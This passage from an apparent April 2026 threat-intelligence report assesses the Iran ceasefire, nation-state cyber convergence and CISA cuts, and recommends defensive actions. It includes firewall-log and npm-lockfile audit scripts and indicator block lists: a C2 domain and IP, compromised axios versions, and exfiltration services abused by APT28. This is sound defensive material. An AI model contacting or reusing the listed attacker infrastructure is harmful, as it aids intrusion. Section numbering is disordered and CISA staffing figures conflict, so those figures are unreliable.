The April 6–10 sequence represents the most volatile 96-hour window of the conflict. The Trump April 6 deadline expired without an agreement. A second deadline on April 7 (8 PM ET) produced a Pakistan-brokered ceasefire announced hours before U.S. bombers were reportedly airborne. Iran fired four waves of ballistic missiles at Israel, 17 missiles and 35 drones at the UAE, and struck targets in Kuwait and Qatar in the hours surrounding the ceasefire announcement. Iran then re-closed Hormuz on April 8, citing Israeli strikes in Lebanon, and imposed tolls exceeding $1M per ship. By April 10, only approximately 15 ships per day were transiting versus the pre-crisis average of 135. The ceasefire’s structural fragility is evidenced by mutually exclusive victory narratives: the U.S. claims Iran capitulated after the elimination of Supreme Leader Khamenei; Iran claims the U.S. accepted its 10-point plan. Islamabad negotiations beginning April 10–11 will determine which interpretation survives.
3.2 Cross-Nation Convergence Patterns
Russia-Iran
The Russia-Iran convergence axis has escalated from hacktivist proxy support to confirmed military technology transfer, real-time intelligence sharing, and coordinated cyber operations. Russia is providing Iran with upgraded Geran-2 drones (jet-engine variants with AI computing and Starlink-capable communications), satellite imagery (24 surveys of 46 objects across 11 Middle Eastern countries in a 10-day period), and real-time U.S. warship positioning data. Ukrainian intelligence documented Z-Pentest Alliance, NoName057(16), and DDoSia Project coordinating with Iranian Handala on Israeli energy infrastructure attacks. The January 2025 Comprehensive Strategic Partnership Treaty (Article 4: mutual intelligence/security service cooperation) provides the legal framework.
Russia-DPRK
The TASS-KCNA formal information warfare agreement (March 28) operationalizes coordinated anti-Western messaging. The Russia-DPRK Strategic Partnership continues with DPRK troops in Russia and military technology exchange. No new cyber-specific collaboration disclosures during this period, though infrastructure sharing between Gamaredon and Lazarus was previously documented.
China-Iran
BeiDou-3 integration was publicly confirmed at the state level by Chinese Embassy counsellor Zhang Heqing. China simultaneously enabled Iran’s military effectiveness (BeiDou), protected Iran diplomatically (UN Security Council veto, April 7), and positioned itself as ceasefire co-mediator. Additional confirmed transfers include Yaogan/Jilin-1 ISR satellite coverage, SMIC chipmaking equipment, and CM-302 anti-ship missile technology. The Atlantic Council’s “Axis of Evasion” framework documents the three-way supply chain cooperation.
China-DPRK
China continues to provide infrastructure support including new Yalu River Bridge connectivity. DPRK expressed support for China’s Taiwan position. No new cyber-specific China-DPRK cooperation disclosed during this period.
3.3 Geopolitical Triggers and Escalation Calendar
3.2a Axis of Evasion Architecture
The Atlantic Council’s “Axis of Evasion” framework documents a three-way supply chain cooperation network between Russia, China, and Iran that extends beyond bilateral relationships into a self-reinforcing ecosystem. Iran transferred 600 disassembled Shahed-16 drones and components for 1,300 additional drones to Russia for its Ukraine campaign; by 2025, Russia assembled approximately 90% of Shaheds domestically. Russia then reversed the flow, shipping Russian-modified Shaheds (Garpiya-3) back to Iran with improvements developed through Ukraine operational experience, and with Chinese specialist support. Iranian drones and missiles now incorporate Chinese BeiDou satellite navigation systems (access granted in 2021); since the war began, Iran uses BeiDou for decoy signals to confuse threat analysis and conceal military movements. U.S. Treasury sanctioned Chinese front companies supplying gyro navigation devices for Iranian UAVs in February 2025, with a second network designated in November 2025. Iranian shadow fleet vessels from China carry precursors for rocket fuel. The Russia-China-Iran triangular supply chain creates reinforcing dependencies that make unilateral disruption increasingly difficult.
3.3a Ceasefire Expiration Risk Assessment
The ceasefire expiration window (approximately April 21–22) represents the highest-probability near-term trigger for simultaneous kinetic and cyber escalation. The ceasefire was already under immediate strain within 24 hours of announcement: Iran re-closed Hormuz citing Israeli violations, Israel continued airstrikes in Lebanon, and Iran’s parliamentary speaker declared “time is running out.” The key tripwire is Iran’s insistence that Lebanon be included in ceasefire protections—a condition explicitly rejected by the United States and Israel. If negotiations in Islamabad fail to produce a framework agreement by the ceasefire’s expiration, the expected cyber response includes: immediate Handala wiper campaigns against U.S. healthcare and defense organizations at or above Stryker scale; CyberAv3ngers escalation from PLC manipulation to disruptive operations at water and energy facilities; DDoS surge across 60+ hacktivist groups targeting Israeli, Gulf, and Western infrastructure; potential undersea cable interdiction if Iran assesses it has lost diplomatic leverage; and coordinated Russia-Iran hacktivist operations against energy and logistics infrastructure. The convergence of ceasefire collapse with CISA’s degraded capacity creates an asymmetric vulnerability window.
3.4a CISA Structural Analysis
The proposed $707M FY2027 CISA budget reduction represents a 24% cut from the approximately $2.9 billion current budget. The reduction targets stakeholder engagement programs, international coordination, state and local election infrastructure funding, and disinformation monitoring—precisely the functions most relevant to the current multi-front threat environment. Combined with the pre-existing approximately 40% vacancy rate (CISA carrying fewer than 2,400 active staff from a pre-2025 baseline of 3,700+), the agency’s operational capacity is approaching a threshold below which core mission delivery becomes structurally impaired. Suspended proactive functions include vulnerability assessments, sector-wide drills, CI assessments, international engagements, and strategic threat detection programs. The timing paradox is acute: the $707M cut was announced April 7—the same day a joint FBI/NSA/CISA/DOE advisory confirmed active Iranian infiltration of U.S. drinking water and power plant control systems. The structural gap between defensive demand (four CRITICAL-rated nation-state threats, confirmed ICS compromises, active ceasefire instability) and CISA capacity has never been wider. Former officials note that CISA’s role as “connective tissue” for federal civilian cyber defense cannot be replicated by any other agency, and its degradation creates cascading effects across the entire defensive ecosystem.
3.1a Ceasefire Terms and Fragility Analysis
The two-week ceasefire announced April 7–8 was brokered by Pakistan following intense shuttle diplomacy and a series of escalating Trump ultimatums. The ceasefire terms, as publicly disclosed, include: immediate halt to hostilities between the United States, Israel, and Iran; Iran to immediately reopen the Strait of Hormuz to international shipping; a 15–20-day negotiation period between U.S. and Iranian delegations (talks to begin in Islamabad April 10–11); and Iran’s 10-point plan accepted as “a workable basis on which to negotiate.” Iran’s 10-point plan reportedly includes: permanent end to the war, lifting of all sanctions, reparations, sovereignty over the Strait of Hormuz, protection of Hezbollah, and withdrawal of all U.S. forces from the region—conditions that are functionally non-starters for Washington. The ceasefire was immediately violated by Israel, which continued airstrikes in Lebanon under “Operation Eternal Darkness.” Iran responded by re-closing Hormuz on April 8, citing Israeli violations. By April 9, Iran’s parliamentary speaker declared “time is running out” for the ceasefire to hold. The structural fragility is compounded by mutually exclusive victory narratives: the U.S. claims Iran capitulated following the elimination of Supreme Leader Khamenei and IRGC command structure degradation, while Iran claims the U.S. accepted its 10-point plan under duress. Both narratives cannot be true, and the Islamabad negotiations will expose this fundamental contradiction.
3.1b Strait of Hormuz Current Status
Despite the ceasefire, the Strait of Hormuz remains effectively closed as of April 10, 2026. Pre-crisis, approximately 135 ships transited the strait daily, carrying roughly 20% of global oil supply. During the April 5–6 deadline period, daily transits collapsed to 8–10 ships. Following the ceasefire announcement, Iran imposed tolls exceeding $1 million per ship and mandated cargo inspections, resulting in approximately 15 ships per day by April 10. Over 800 tankers remain stranded or waiting near the chokepoint. Iran has described the strait as a “permission-only corridor” for selected friendly-flag vessels. Brent crude has approached $120/barrel. The economic impact extends beyond petroleum: fertilizer supply chains, LNG shipments, and containerized goods are all disrupted. Iran’s explicit extension of threats to Bab al-Mandeb (April 6) creates risk to the Red Sea cable and shipping corridor that serves as the primary alternative route for Gulf producers using the Yanbu pipeline. Simultaneous disruption of Hormuz and Bab al-Mandeb would constitute the most significant chokepoint crisis since the 1973 oil embargo.
3.5a Forecast: 30-Day Scenario Analysis
Scenario 1 (Ceasefire Holds, Negotiations Progress — Probability: 25–30%): Islamabad talks produce a framework agreement extending the ceasefire with specific benchmarks for Hormuz reopening and de-escalation. In this scenario, Iranian cyber operations continue against Israel but at reduced tempo against U.S. targets. DPRK crypto theft operations continue unabated. Chinese pre-summit espionage remains elevated through the Trump-Xi meeting. Russian APT operations continue at wartime tempo on the Ukraine front with reduced Iran-theater activity. Hacktivist groups maintain operational capability but reduce public claims.
Scenario 2 (Ceasefire Collapses — Probability: 40–45%): Negotiations fail on the Lebanon inclusion question or Iran’s maximalist conditions prove irreconcilable. In this scenario, expect immediate resumption of kinetic operations, Handala wiper campaigns against U.S. organizations at or above Stryker scale, CyberAv3ngers escalation from PLC manipulation to disruptive operations at water and energy facilities, potential undersea cable interdiction, coordinated Russia-Iran cyber surge against energy and logistics infrastructure, and DPRK actors potentially exploiting the chaos for additional supply chain compromises.
Scenario 3 (Extended Ceasefire with Gradual Hormuz Reopening — Probability: 25–30%): Iran partially reopens Hormuz under oversight while negotiations continue through an extended framework. In this scenario, cyber operations continue at elevated but manageable tempo. Handala maintains Israel-focused operations but delays U.S. attack resumption. The primary risk shifts to pre-positioned access (MuddyWater in U.S. bank/airport, CyberAv3ngers PLC access) being activated during a future escalation. CISA’s degraded capacity becomes the binding constraint on U.S. defensive posture.
3.3a NATO Locked Shields 2026 — Exercise Assessment
NATO’s Locked Shields 2026, organized by the Cooperative Cyber Defence Centre of Excellence (CCDCOE) in Tallinn, is the world’s largest live-fire cyber defense exercise. The exercise entered its main phase during the reporting period following the Partners’ Run on March 26, which served as the final rehearsal. The 2026 iteration includes approximately 4,000 participants from 40 nations defending against approximately 6,000 simulated cyberattacks across cloud infrastructure, AI-driven attack scenarios, and increasingly complex information environment tracks. The exercise includes legal, strategic decision-making, and communications tracks alongside technical defense scenarios. Preparation milestones included the September 2025 Initial Planning Conference in Tallinn (300 participants, 35 countries), the January 23 Blue Team Leadership Conference in Riga, and the January 29 Main Planning Conference in Tallinn (100 representatives, 38 countries). The exercise’s timing is directly relevant to the current threat environment: national Blue Teams are training to defend critical infrastructure against live attacks at precisely the moment Iran-linked actors are actively compromising U.S. and allied ICS/OT systems, Russian APTs are targeting NATO logistics networks via PRISMEX, and Chinese actors maintain persistent access to telecom infrastructure.
3.3b U.S. Midterm Elections — Early Warning
The November 2026 U.S. midterm elections, while seven months away, warrant early inclusion in the escalation calendar given the documented capabilities and intent of all four nation-state actors. Russia’s demonstrated information warfare infrastructure (NoName057(16), CARR, hacktivist proxy network) and formal TASS-KCNA cooperation agreement create a scalable narrative amplification capability. China’s GoLaxy-style cognitive warfare databases—documented targeting Taiwan with 23 million household records and AI-driven propaganda—represent a template that could be adapted for U.S. election interference. Iran’s Cotton Sandstorm (Emennet Pasargad), sanctioned by the EU for the 2024 Paris Olympics disinformation operations, has documented AI-generated content and influence operation capabilities. DPRK’s motivation for election interference is less direct but its IT worker operations and social engineering campaigns create infrastructure that could be repurposed. The CISA budget cut’s elimination of “state and local election infrastructure funding” and “disinformation and misinformation monitoring efforts” creates a defensive gap precisely in the functions most relevant to election security.
3.4 CISA Degradation Assessment
The Cybersecurity and Infrastructure Security Agency faces a structural crisis that directly impacts U.S. defensive posture. An additional $707M FY2027 budget cut was announced on April 7—the same day the six-agency ICS advisory confirmed active Iranian exploitation of U.S. water and energy infrastructure. The proposed cut eliminates approximately 900 positions on top of a pre-existing approximately 40% vacancy rate, reducing total staffing to approximately 2,600 from a pre-2025 baseline of 3,700+. Suspended functions include proactive vulnerability assessments, sector-wide drills, CI assessments, international engagements, and strategic threat detection programs. The structural gap between defensive demand and CISA capacity has never been wider. As one analyst noted: “The White House wants CISA to focus solely on protecting the federal government’s computer systems and to leave states, local governments and private industry to fend for themselves.”
3.5 Strategic Outlook and Forecast (Next 30–90 Days)
The next 30–90 days represent the most geopolitically loaded and cyber-intensive window since the beginning of the multi-front crisis. The ceasefire’s fragility creates a binary outcome: successful Islamabad negotiations extend the diplomatic track, while failure triggers immediate resumption of kinetic and cyber escalation. Iranian cyber operations will continue regardless of kinetic status, as explicitly declared by Handala. China’s pre-summit intelligence collection is at peak intensity, with CISA’s degradation creating maximum collection opportunity. DPRK crypto theft operations show no signs of abating and may accelerate as Drift Protocol laundering proceeds. Russia’s spring offensive stall may redirect cyber assets toward the Iran theater for asymmetric pressure. The EO 14390 May 5 deadline arrives with an operationally diminished CISA unable to serve as an effective implementation partner. NATO Locked Shields 2026 provides allied cyber defense rehearsal at the exact moment it is most needed.
3.5b Intelligence Gaps and Collection Priorities
The following intelligence gaps have been identified as priorities for the next collection cycle (April 10–17, 2026):
• FBI DCS-3000 Formal Attribution: No public attribution to a named threat actor has been issued. Confirmation or denial of Salt Typhoon involvement would significantly alter the counterintelligence damage assessment and response framework. Monitor for congressional testimony, FISMA reporting updates, or interagency advisory publications.
• Ceasefire Durability: Whether the Islamabad negotiations (beginning April 10–11) produce a framework agreement extending the two-week ceasefire is the single most consequential variable for the near-term cyber threat environment. Diplomatic failure triggers immediate multi-domain escalation.
• Handala Next Operation: The group’s explicit statement that cyber war continues independently of military truces, combined with Nozomi Networks’ prediction of a “Stryker-scale” attack during the ceasefire, creates an elevated watch priority. Monitor Handala’s X and Telegram channels for targeting indicators.
• Rockwell PLC Exploitation Scope: The April 7 advisory confirmed operational disruption at unnamed facilities but did not disclose specific victims, geographic distribution of compromised systems, or whether attackers have achieved capability for destructive operations versus the manipulation and monitoring currently confirmed. Monitor ICS-CERT follow-on advisories.
• BPFdoor Victim Geography: Rapid7 did not disclose specific affected carriers or countries for the BPFdoor campaign. “Middle East and Asia” is the reported regional scope. The full extent of Red Menshen’s telecom backbone access remains unknown.
• Axios Downstream Impact: Mandiant’s assessment that impact assessment “will likely take several months” means secondary exploitation of stolen credentials from the March 31 exposure window is ongoing or imminent. Monitor for abnormal activity in npm token registries and CI/CD pipeline logs.
• Salt Typhoon Eviction Status: AT&T and Verizon continue to withhold Mandiant security assessments, and Senator Cantwell’s February 2026 letter demanding CEO testimony remains unresolved. Whether telecoms have actually evicted Salt Typhoon remains an open and critical question.
• Undersea Cable Interdiction Preparation: Whether IRGC’s verbal threats to cables have been accompanied by physical positioning of midget submarines, combat diver units, or underwater vehicles near cable corridors in the Strait of Hormuz or Bab al-Mandeb. Maritime intelligence feeds and undersea monitoring are the primary collection vectors.
• Iran Internet Restoration Timeline: Any increase above the current approximately 1% connectivity level would be the most important indicator of impending high-end APT operation resumption from within Iran. Monitor NetBlocks and OONI data.
• Trump-Xi Summit Outcomes: Whether the Beijing summit produces any cyber-related deliverables—such as mutual restraint commitments, tech export control agreements, or sanctions discussions—has direct implications for the Chinese APT threat level in the post-summit period.
3.5c Historical Precedent Analysis
The current threat environment has limited historical precedent in its combination of simultaneous active kinetic conflict, confirmed critical infrastructure compromises across multiple sectors, nation-state cyber coordination at scale, and structural degradation of the primary federal cyber defense agency. The closest historical analogs provide partial insight:
The 2022 Ukraine invasion triggered coordinated Russian cyber operations (Sandworm wipers, hacktivist DDoS, Gamaredon mass phishing) but was confined to one theater and one primary adversary. The current environment involves four nation-state actors operating across the Middle East, Europe, and the U.S. homeland simultaneously. The 2023 Israel-Hamas conflict activated Iranian cyber proxies including CyberAv3ngers’ Unitronics campaign, but Iranian state capabilities were largely intact and unconstrained. The current environment features Iranian state capabilities degraded by kinetic strikes and a 41-day internet blackout, with proxy operations becoming the primary threat vector by default rather than design. The 2017 NotPetya attack demonstrated destructive cyber capability at global scale but was a single operation rather than a sustained campaign environment. The current environment features multiple concurrent sustained campaigns (PRISMEX, BPFdoor, Rockwell PLC exploitation, Axios supply chain) operating simultaneously across different sectors and adversaries.
The distinguishing factor of the current environment is convergence: not merely multiple threats operating in parallel, but documented coordination between adversarial states (Russia-Iran cyber collaboration, China-Iran BeiDou integration, Russia-DPRK information warfare formalization) creating compounding effects that exceed the sum of individual threats. The Atlantic Council’s “Axis of Evasion” framework and the Ukrainian intelligence assessment of April 7 provide the strongest evidence that this convergence is structural rather than coincidental—driven by shared geopolitical interests, overlapping targets, and emergent infrastructure sharing at the group and tool level.
3.5d Defense Posture Assessment
The U.S. defensive posture is assessed as structurally inadequate for the current threat environment across three dimensions. First, federal capacity: CISA’s approximately 40% vacancy rate and proposed $707M FY2027 cut eliminate the agency’s ability to perform proactive vulnerability assessments, sector-wide drills, and international coordination at the precise moment when all three functions are most needed. The agency’s website was last updated February 17, 2026, and many of its proactive programs have been suspended. Second, critical infrastructure exposure: 5,219 internet-exposed Rockwell PLCs (74.6% in the U.S.), persistent Salt Typhoon access in 200+ telecom companies, kernel-level BPFdoor implants in telecom backbone infrastructure, and MuddyWater backdoors in U.S. banking and aviation networks create an attack surface that existing detection and response capabilities cannot fully monitor. Third, deterrence erosion: the Trump administration’s decision to halt Salt Typhoon sanctions removes diplomatic deterrence for Chinese operations; the sub-24-hour reconstitution of Handala after FBI domain seizures demonstrates the inadequacy of infrastructure-focused disruption; and the explicit Handala declaration that cyber operations will continue regardless of military ceasefire signals that Iranian deterrence frameworks have failed for non-state proxies.
Compensating factors include: the multi-agency advisory architecture demonstrated by the April 7 six-agency alert shows federal coordination capability remains functional for reactive responses; NATO’s Locked Shields 2026 exercise is currently stress-testing allied defensive capabilities under realistic conditions; and private sector threat intelligence (Mandiant, CrowdStrike, Rapid7, Trend Micro, Unit 42) continues to provide high-quality detection and attribution research that partially compensates for reduced federal analytical capacity. However, these compensating factors are insufficient to offset the structural degradation of CISA as the “connective tissue” between federal, state, local, and private sector cyber defense.
PART 4: RECOMMENDED ACTIONS
4.1 Immediate Actions (24–72 Hours)
1. Audit ALL Rockwell Automation Allen-Bradley PLC environments per the April 7 six-agency advisory (AA26-097A). Remove PLCs from direct internet exposure (no public IP, no port forwarding; remote access only through a monitored VPN or jump host). Set physical mode switches to RUN, which blocks remote program downloads and online edits until an operator turns the key. Review firewall and flow logs for inbound traffic on TCP 44818 (EtherNet/IP CIP explicit messaging), 2222 (EtherNet/IP I/O and legacy Rockwell CSP), 102 (ISO-TSAP), 502 (Modbus/TCP), and 22 (SSH), and treat any accepted session from outside the engineering network as an incident rather than a misconfiguration.
2. Verify no Drift Protocol/UNC4736 exposure in organizational DeFi or cryptocurrency holdings. Audit Solana governance multisig configurations for durable nonce abuse: a transaction signed against a nonce account does not expire with the recent blockhash the way an ordinary transaction does, so a pre-signed transaction can sit unsubmitted until the attacker chooses to broadcast it. Review any outstanding signed-but-unsubmitted transactions and any interactions with recently created trading entities.
3. Run BPFdoor detection scripts (Rapid7) on all Linux systems in telecom, carrier-grade, or critical infrastructure environments. Baseline BPF filter activity (for example, which processes hold packet sockets with attached filters, which ss -0pb lists) and audit for kernel-level anomalies; a process that binds no TCP/UDP port yet receives traffic through a packet socket is the pattern BPFdoor relies on.
4. Patch CVE-2026-35616 (Fortinet FortiClient EMS) and CVE-2026-1340 (Ivanti EPMM) immediately. Both are in CISA KEV with high Chinese APT exploitation relevance.
5. Audit npm dependency trees for Axios transitive contamination, checking lockfiles (package-lock.json, yarn.lock, pnpm-lock.yaml) and CI build caches as well as node_modules on developer machines, since a nested copy pulled in by a vendor SDK does not appear as a direct dependency. Search for plain-crypto-js in node_modules. Block C2 traffic to sfrclak[.]com and 142.11.206.73. Treat any system that installed axios@1.14.1 or axios@0.30.4 as fully compromised, including rotation of every credential and token that was present on it.
6. Review DNS infrastructure for Operation Masquerade/FrostArmada residual compromise. Verify DNS settings on all TP-Link WR841N and MikroTik routers. Check for unauthorized DNS resolver changes.
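A worked example of the log review in item 1 above, added here and not code from the advisory or from this report's sources. It assumes a key=value firewall log format, an engineering-workstation allowlist (10.50.1.10) and the sample records, all of which are constructed for the illustration; the RFC 1918 ranges are listed explicitly because Python's ipaddress.is_private also treats the documentation ranges used in the samples as private.

```python
"""Triage firewall logs for inbound sessions to PLC service ports.

Added example (not from the advisory or this report's sources). Log format,
engineering allowlist and sample records are constructed assumptions.
"""
import ipaddress
import re
from collections import defaultdict
from dataclasses import dataclass

# Ports named in the advisory, annotated with the service each normally carries.
PLC_PORTS = {
    44818: "EtherNet/IP (CIP explicit messaging)",
    2222: "EtherNet/IP I/O / legacy Rockwell CSP",
    102: "ISO-TSAP (Siemens S7 comms)",
    502: "Modbus/TCP",
    22: "SSH (PLC or gateway management)",
}

# RFC 1918 listed explicitly: ipaddress.is_private also covers the documentation
# ranges (198.51.100.0/24 etc.), which would hide a public source in the samples.
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Assumed: the only hosts that may open sessions to PLC service ports.
ENGINEERING_HOSTS = {"10.50.1.10"}

# Assumed key=value record layout (common across firewall vendors).
LOG_RE = re.compile(
    r"action=(?P<action>\w+)\s+proto=(?P<proto>\w+)\s+src=(?P<src>[\d.]+)\s+"
    r"sport=\d+\s+dst=(?P<dst>[\d.]+)\s+dport=(?P<dport>\d+)"
)

# Constructed sample records.
SAMPLE_LOG = """\
2026-04-08T02:14:07Z fw01 action=accept proto=TCP src=10.50.1.10 sport=51022 dst=10.50.20.5 dport=44818
2026-04-08T02:15:41Z fw01 action=accept proto=TCP src=198.51.100.23 sport=40011 dst=10.50.20.5 dport=44818
2026-04-08T02:16:02Z fw01 action=accept proto=TCP src=10.20.3.77 sport=49321 dst=10.50.20.5 dport=502
2026-04-08T02:16:30Z fw01 action=drop proto=TCP src=203.0.113.9 sport=55555 dst=10.50.20.6 dport=2222
2026-04-08T02:16:31Z fw01 action=drop proto=TCP src=203.0.113.9 sport=55556 dst=10.50.20.6 dport=502
2026-04-08T02:17:12Z fw01 action=accept proto=TCP src=198.51.100.23 sport=40012 dst=10.50.20.5 dport=443
2026-04-08T02:18:00Z fw01 action=accept proto=UDP src=10.50.1.10 sport=2222 dst=10.50.20.5 dport=2222
"""


@dataclass(frozen=True)
class Finding:
    src: str
    dst: str
    dport: int
    service: str
    severity: str
    reason: str


def is_internal(addr: str) -> bool:
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in RFC1918)


def triage(lines):
    """One Finding per TCP record that touches a PLC port and is not an
    allowed session from an engineering host."""
    findings = []
    for line in lines:
        m = LOG_RE.search(line)
        if not m or m["proto"].upper() != "TCP":  # advisory scope is TCP
            continue
        dport = int(m["dport"])
        if dport not in PLC_PORTS:
            continue
        src, dst = m["src"], m["dst"]
        allowed = m["action"].lower() in ("accept", "allow", "permit")
        if allowed and src in ENGINEERING_HOSTS:
            continue  # expected engineering traffic
        if allowed and not is_internal(src):
            sev, why = "critical", "non-RFC1918 source reached a PLC service port"
        elif allowed:
            sev, why = "high", "internal host outside the engineering allowlist reached a PLC service port"
        else:
            sev, why = "low", "blocked probe of a PLC service port"
        findings.append(Finding(src, dst, dport, PLC_PORTS[dport], sev, why))
    return findings


def sweep_sources(findings, min_ports=2):
    """Sources that touched several PLC ports: scanning rather than a stray session."""
    seen = defaultdict(set)
    for f in findings:
        seen[f.src].add(f.dport)
    return {src: sorted(ports) for src, ports in seen.items() if len(ports) >= min_ports}


if __name__ == "__main__":
    results = triage(SAMPLE_LOG.splitlines())
    for f in results:
        print(f"[{f.severity}] {f.src} -> {f.dst}:{f.dport} ({f.service}): {f.reason}")
    print("port sweeps:", sweep_sources(results))
```

Run against real exports by replacing SAMPLE_LOG with the firewall's output and adjusting LOG_RE to the vendor's field names; the severity split matters because an accepted session from a public address to 44818 is evidence of the compromise the advisory describes, while a dropped probe is reconnaissance worth tracking but not an intrusion.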
4.2 Near-Term Actions (1–4 Weeks)
1. Harden Microsoft Intune/Entra ID configurations per CISA endpoint management advisory. Enforce phishing-resistant MFA. Implement multi-admin approval for device wipe and script execution actions.
2. Review ISP vendor access to internal surveillance, law enforcement, or sensitive systems. The FBI DCS-3000 breach vector (ISP vendor pivot) applies to any organization with vendor-managed network components.
3. Block traffic from identified TA416 VPS ASNs (AS149440, AS6134, AS138915) at perimeter. Audit inbound email from external government and diplomatic addresses for PlugX delivery indicators.
4. Conduct tabletop exercise simulating Iranian ICS/OT intrusion escalation from reconnaissance/manipulation to disruptive/destructive phase, incorporating the Stryker Intune wiper template.
5. Evaluate blocking or monitoring cloud storage services abused by APT28: filen.io, icedrive.net, and webhook.site.
4.3 Ongoing/Strategic
1. Establish continuous monitoring of ceasefire status. Prepare cyber incident response plans for immediate activation upon ceasefire collapse (approximately April 21–22 expiration window).
2. Review DNI 2026 Annual Threat Assessment with organizational leadership as authoritative IC endorsement of CRITICAL threat levels from all four nation-state actors. Use as basis for budget and staffing justifications.
3. Maintain npm/PyPI package monitoring for DPRK supply chain variants. Implement version cooldown policies (for example, min-release-age=7d) across all package managers so that a newly published version is not installable until it has been public for a week, which gives registry scanners and maintainers time to flag a hijacked release before it reaches builds.
4. Monitor for Handala attack resumption signals on X and Telegram. The group’s explicit pledge to resume U.S. attacks “when conditions permit” should drive continuous monitoring and elevated alert posture.
4.1a Priority Justification
The immediate actions above are prioritized based on three criteria: confirmed active exploitation (the six-agency advisory confirms Iranian actors are currently inside Rockwell PLC environments), scope of potential impact (Axios supply chain propagation could affect millions of downstream applications), and time sensitivity (CVE-2026-35616 and CVE-2026-1340 are in CISA KEV with historical patterns showing Chinese APT exploitation within days of disclosure). The Rockwell PLC audit is the highest priority because it addresses confirmed active compromises at U.S. water and energy facilities where operational disruption has already been documented. Organizations should treat the advisory’s recommendations as mandatory regardless of whether they believe they are specifically targeted—the 5,219 exposed Rockwell devices create a target-rich environment for opportunistic exploitation.
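To make the Axios transitive-contamination audit from 4.1 item 5 concrete, the following added example (not code from the advisory, from npm, or from this report's sources) walks a package-lock.json v2/v3 dependency graph and reports every chain from the root project to a flagged package, using Node's own nearest-node_modules resolution rule so that a clean hoisted axios and a compromised nested copy are told apart. The sample lockfile, the project name and the dependency edge from axios@1.14.1 to plain-crypto-js are constructed assumptions for the illustration.

```python
"""Walk a package-lock.json (v2/v3) for flagged packages and report every
dependency chain from the root project to each hit.

Added example (not code from the advisory, npm, or this report's sources).
The sample lockfile, project name and the dependency edge from axios@1.14.1
to plain-crypto-js are constructed assumptions for the illustration.
"""
import json
import sys

# Indicators from the report: compromised axios releases and the dropped package.
BAD_VERSIONS = {"axios": {"1.14.1", "0.30.4"}}
BAD_PACKAGES = {"plain-crypto-js"}

# Constructed lockfile: a clean hoisted axios at the top level and a nested
# compromised copy pulled in by a vendor SDK.
SAMPLE_LOCK = {
    "name": "billing-portal",
    "lockfileVersion": 3,
    "packages": {
        "": {"dependencies": {"payments-sdk": "^2.0.0", "axios": "^1.7.0"}},
        "node_modules/axios": {"version": "1.7.9", "dependencies": {"follow-redirects": "^1.15.6"}},
        "node_modules/follow-redirects": {"version": "1.15.9"},
        "node_modules/payments-sdk": {"version": "2.3.1", "dependencies": {"axios": "^1.14.0"}},
        "node_modules/payments-sdk/node_modules/axios": {
            "version": "1.14.1",
            "dependencies": {"plain-crypto-js": "^1.0.0", "follow-redirects": "^1.15.6"},
        },
        "node_modules/payments-sdk/node_modules/plain-crypto-js": {"version": "1.0.0"},
    },
}


def pkg_name(key):
    """'node_modules/a/node_modules/@s/b' -> '@s/b'; the root key '' stays ''."""
    return key.rsplit("node_modules/", 1)[-1] if key else ""


def resolve(packages, from_key, name):
    """Mimic Node's lookup: nearest node_modules/<name> walking up from from_key."""
    base = from_key
    while True:
        candidate = f"{base}/node_modules/{name}" if base else f"node_modules/{name}"
        if candidate in packages:
            return candidate
        if not base:
            return None
        base = base.rsplit("/node_modules/", 1)[0] if "/node_modules/" in base else ""


def dependents(packages, target):
    """Packages whose declared dependency on target's name resolves to target."""
    name = pkg_name(target)
    out = []
    for key, meta in packages.items():
        declared = {**meta.get("dependencies", {}), **meta.get("optionalDependencies", {})}
        if name in declared and resolve(packages, key, name) == target:
            out.append(key)
    return out


def chains_to_root(packages, key, seen=()):
    """All paths root -> ... -> key, as lists of lockfile keys."""
    if key == "":
        return [[""]]
    chains = []
    for dep in dependents(packages, key):
        if dep in seen:  # guard against dependency cycles
            continue
        for chain in chains_to_root(packages, dep, seen + (key,)):
            chains.append(chain + [key])
    return chains


def audit(lock):
    if "packages" not in lock:
        raise ValueError("lockfileVersion 1 (nested 'dependencies' tree) is not handled here")
    packages = lock["packages"]
    root_name = lock.get("name", "(root)")

    def label(k):
        return root_name if k == "" else f"{pkg_name(k)}@{packages[k].get('version', '?')}"

    hits = []
    for key, meta in packages.items():
        name, version = pkg_name(key), meta.get("version")
        if name in BAD_PACKAGES or version in BAD_VERSIONS.get(name, ()):
            chains = [" > ".join(label(k) for k in c) for c in chains_to_root(packages, key)]
            hits.append({"package": f"{name}@{version}", "path": key, "chains": chains})
    return hits


if __name__ == "__main__":
    if len(sys.argv) > 1:
        with open(sys.argv[1]) as fh:
            lock = json.load(fh)
    else:
        lock = SAMPLE_LOCK
    for hit in audit(lock):
        print(f"{hit['package']} at {hit['path']}")
        for chain in hit["chains"] or ["(no dependent found: orphan or extraneous entry)"]:
            print("   ", chain)
```

Run it as `python audit_lock.py package-lock.json` against each repository and CI cache; the reported chain names the intermediate package (here the vendor SDK) whose pin must be changed, which `npm ls axios` does not show when the compromised copy is nested.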
4.2a Risk Mitigation Framework
Near-term actions focus on hardening the attack surfaces most actively exploited during this period. Microsoft Intune/Entra ID hardening addresses the Stryker attack vector, which demonstrated that weaponizing legitimate MDM tools can bypass traditional security controls. ISP vendor access audits address the DCS-3000 attack vector, where commercial third-party infrastructure provided the pivot point into federal systems. TA416/Mustang Panda infrastructure blocking addresses the most geographically expansive Chinese espionage campaign targeting European and Middle Eastern diplomatic missions. The tabletop exercise recommendation addresses the specific gap in ICS/OT incident response capability that the six-agency advisory has exposed: many water and energy utilities lack tested procedures for responding to PLC manipulation because their existing response plans were designed for IT-centric incidents.